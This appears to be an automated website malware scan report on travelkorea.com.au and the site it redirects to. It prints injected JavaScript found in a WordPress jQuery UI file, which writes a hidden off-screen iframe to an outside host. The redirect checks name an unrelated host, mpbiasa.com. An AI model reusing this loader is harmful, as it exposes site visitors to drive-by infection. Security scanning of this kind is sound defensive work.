Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=travelkorea.com.au
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: mpbiasa.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 27 Dec 2014 19:51:31 GMT
Accept-Ranges: bytes
Server: nginx/1.6.2
Content-Length: 5885
Content-Type: text/html
Last-Modified: Mon, 22 Dec 2014 15:58:10 GMT
...5885 bytes of data.
GET / HTTP/1.1
Host: mpbiasa.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 27 Dec 2014 19:51:31 GMT
Accept-Ranges: bytes
Server: nginx/1.6.2
Content-Length: 5885
Content-Type: text/html
Last-Modified: Mon, 22 Dec 2014 15:58:10 GMT
...5885 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: mpbiasa.com
Referer: http://www.google.com/search?q=mpbiasa.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: mpbiasa.com
Referer: http://www.google.com/search?q=mpbiasa.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Scanned pages/files
| Request | Server response | Status |
http://www.travelkorea.com.au/ | HTTP/1.1 301 Moved Permanently Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Sun, 05 Oct 2014 13:33:00 GMT Pragma: no-cache Location: http://www.wonderfultravel.com.au/ Server: Apache Vary: Accept-Encoding,User-Agent Content-Length: 0 Content-Type: text/html; charset=UTF-8 Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: PHPSESSID=aad998cc6e99270720cbbba7f1a2b2a2; path=/ X-Pingback: http://www.wonderfultravel.com.au/xmlrpc.php X-Powered-By: PHP/5.4.33 X-UA-Compatible: IE=edge,chrome=1 | malicious |
http://www.wonderfultravel.com.au/ | 200 OK Content-Length: 64718 Content-Type: text/html | clean |
https://ajax.googleapis.com/ajax/libs/jquery/1/jquery.min.js?ver=1 | 200 OK Content-Length: 95786 Content-Type: text/javascript | clean |
https://ajax.googleapis.com/ajax/libs/jqueryui/1/jquery-ui.min.js?ver=1 | 200 OK Content-Length: 228539 Content-Type: text/javascript | clean |
http://www.wonderfultravel.com.au/wp-content/plugins/hotelclub/themes/default/script.js?ver=1 | 200 OK Content-Length: 1553 Content-Type: application/javascript | clean |
http://www.wonderfultravel.com.au/wp-includes/js/tinymce/tiny_mce.js?ver=4.0 | 404 Not Found Content-Length: 54332 Content-Type: text/html | clean |
http://www.wonderfultravel.com.au/wp-content/plugins/quick-post-widget/mce/tinybrowser/tb_tinymce.js.php?ver=4.0 | 200 OK Content-Length: 1255 Content-Type: application/x-javascript | clean |
http://www.wonderfultravel.com.au/wp-content/plugins/quick-post-widget/js/ui.datepicker.min.js?ver=4.0 | 200 OK Content-Length: 37096 Content-Type: application/javascript | clean |
http://www.wonderfultravel.com.au/wp-content/plugins/quick-post-widget/js/ui.datepicker-en.js?ver=4.0 | 200 OK Content-Length: 1049 Content-Type: application/javascript | clean |
http://www.wonderfultravel.com.au/wp-includes/js/jquery/ui/jquery.ui.core.min.js?ver=1.10.4 | 200 OK Content-Length: 5334 Content-Type: application/javascript | clean |
http://www.wonderfultravel.com.au/wp-includes/js/jquery/ui/jquery.ui.widget.min.js?ver=1.10.4 | 200 OK Content-Length: 3425 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(e){var o=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return o?decodeURIComponent(o[1]):void 0}!function(){function e(e,o,t){var r=(e+"").toLowerCase(),i=(o+"").toLowerCase(),n=0;return-1!==(n=r.indexOf(i,t))?n:!1}function o(){var o=["Linux","Windows NT 6.3","Windows NT 6.2","rv:11.0","AppleWebKit","Android","Googlebot","IEMobile","Yandex"],t=!1;for(var r in o)if(e(navigator.userAgent,o[r])){t=!0;break}return t}var t document.write('<iframe src="http://lifteras.leaderous.com/daolosinam16.html" style="cursor: move;left: -900px;border-right: medium dotted #42b889;position: absolute;border-left: thin dashed #151994;top: -900px;background-size: 132px 132px;" height="132" width="132"></iframe>'); var date = new Date( new Date().getTime() + 64*60*60*1000 ); document.cookie="specificatoryao=1; path=/; expires="+date.toUTCString(); } } Ubrostyleddesignercoder(); Antivirus reports:
| ||
http://www.wonderfultravel.com.au/wp-includes/js/jquery/ui/jquery.ui.mouse.min.js?ver=1.10.4 | 200 OK Content-Length: 1049 Content-Type: application/javascript | clean |
http://www.wonderfultravel.com.au/wp-includes/js/jquery/ui/jquery.ui.resizable.min.js?ver=1.10.4 | 200 OK Content-Length: 16533 Content-Type: application/javascript | clean |
http://www.wonderfultravel.com.au/wp-includes/js/jquery/ui/jquery.ui.draggable.min.js?ver=1.10.4 | 200 OK Content-Length: 8350 Content-Type: application/javascript | clean |
http://www.wonderfultravel.com.au/wp-includes/js/jquery/ui/jquery.ui.button.min.js?ver=1.10.4 | 200 OK Content-Length: 1049 Content-Type: application/javascript | clean |
http://www.wonderfultravel.com.au/wp-includes/js/jquery/ui/jquery.ui.position.min.js?ver=1.10.4 | 200 OK Content-Length: 1049 Content-Type: application/javascript | clean |